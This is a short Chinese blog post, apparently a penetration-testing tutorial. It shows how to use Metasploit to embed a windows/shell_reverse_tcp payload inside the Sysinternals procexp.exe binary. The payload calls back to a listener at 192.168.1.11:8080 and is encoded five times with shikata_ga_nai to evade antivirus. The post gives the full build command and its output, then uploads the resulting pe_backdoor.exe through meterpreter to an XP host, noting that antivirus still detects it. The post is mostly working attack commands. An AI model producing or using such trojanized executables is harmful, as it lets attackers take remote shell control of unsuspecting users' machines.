metasploit自定义可执行文件模板

在网上下载Sysinternals,解压,得到procexp.exe,把它传到BT5上去,然后生成pe_backdoor.exe

root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m40.713s
user    0m24.734s
sys     0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage  documentation  HACKING  msfbinscan  msfd        msfgui       msfpescan  msfrpcd    pe_backdoor.exe  scripts  THIRD-PARTY.md
COPYING   external       lib      msfcli      msfelfscan  msfmachscan  msfrop     msfupdate  plugins          spec     tools
data      Gemfile        modules  msfconsole  msfencode   msfpayload   msfrpc     msfvenom   README.md        test     work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe 
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/


上传到XP:

meterpreter > upload pe_backdoor.exe
[*] uploading  : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded   : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >

杀毒软件报告威胁,文件名改为hello.exe,也报告威胁。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值